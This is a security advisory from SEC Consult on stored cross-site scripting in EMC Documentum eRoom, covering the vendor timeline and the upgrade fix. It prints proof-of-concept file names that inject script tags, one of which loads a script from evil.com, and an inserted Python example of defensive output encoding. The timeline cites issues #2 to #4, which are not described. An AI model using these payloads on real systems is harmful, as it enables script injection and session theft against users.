title: Multiple permanent cross-site scripting vulnerabilities
product: EMC Documentum eRoom
vulnerable version: 7.33.498.98
fixed version: 7.4.4
impact: high
homepage: http://www.emc.com/products/detail/software2/eroom.htm
found: 2011-05-05
by: F. Lukavsky, B. Schildendorfer
    SEC Consult Vulnerability Lab
    https://www.sec-consult.com
=======================================================================
"EMC Documentum eRoom is easy-to-use online team collaboration software that enables distributed teams to work together more efficiently. With Documentum eRoom, teams around the world can accelerate document collaboration and group activities, improve the development and delivery of products and services, optimize collaborative business processes, improve innovation, and streamline decision-making."
There are many parameters which are not properly sanitized and thus vulnerable to XSS.
1) Permanent Cross-Site Scripting within file names
The extension of files uploaded to Documentum eRoom is not sanitized. The following file name would lead to execution of script code as soon as the file is viewed (i.e. in the search results or the directory view):
file."><script>alert(1)</script>
"><script src="http://evil.com/evil%2ejs"></script>
"><script src="/eRoomReq/Files/facility/eRoom/0_f000/test%2etxt"></script>
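How a listing view can neutralise such a file name, as an added example (not eRoom's code and not the vendor's fix). The function names, the extension allowlist pattern and the `/files/` URL prefix are assumptions made for illustration.

```python
import html
import re
from urllib.parse import quote

# Assumed policy: an extension is 1-10 ASCII letters or digits.
SAFE_EXT = re.compile(r"[A-Za-z0-9]{1,10}")


def split_name(filename):
    """Return (stem, extension); extension is '' when the name has no dot."""
    stem, dot, ext = filename.rpartition(".")
    return (stem, ext) if dot else (filename, "")


def extension_allowed(filename):
    """Upload-time check: refuse extensions that carry anything but letters/digits."""
    _, ext = split_name(filename)
    return ext == "" or bool(SAFE_EXT.fullmatch(ext))


def render_row(filename):
    """Listing-time defence: encode the stored name for each output context.

    This is the control that matters; the upload check above only reduces
    what can reach storage and does not replace output encoding.
    """
    href = "/files/" + quote(filename, safe="")  # URL context (hypothetical prefix)
    attr = html.escape(href, quote=True)         # HTML attribute context
    text = html.escape(filename, quote=True)     # HTML text and title context
    return f'<li><a href="{attr}" title="{text}">{text}</a></li>'


# First file name from the advisory, plus a benign name constructed for contrast.
POC_NAME = 'file."><script>alert(1)</script>'
BENIGN_NAME = "report.pdf"

if __name__ == "__main__":
    for name in (POC_NAME, BENIGN_NAME):
        print(extension_allowed(name), render_row(name))
```
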
Documentum eRoom version 7.33.498.98
2011-11-22: Contacting vendor through firstname.lastname@example.org
2011-11-23: Vendor response, issue is being forwarded to the appropriate
            product development team for review and confirmation
2011-11-28: Vendor response, issue has been reviewed
            affected version is not supported anymore
            current version not affected by #1 and #3
            additional information required for #2 and #4
2011-11-29: Providing additional information for #2 and #4
2011-11-30: Vendor cannot reproduce #2 and #4, asks for additional
            information
2012-01-12: Call with vendor to clarify remaining issues.
2012-01-27: Vendor requests additional information regarding the test
            environment in order to reproduce vulnerabilities #2 and #4
2012-03-13: EMC releases patch
2012-03-15: Public release of SEC Consult advisory
According to the vendor, these issues have been fixed in version 7.4.4 of Documentum eRoom. Upgrade to the new release.
Restrict access to the software as much as possible. Only allow trusted IP addresses and users in order to minimise attack surface. Do not host confidential information in Documentum eRoom.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com

EOF F. Lukavsky / @2012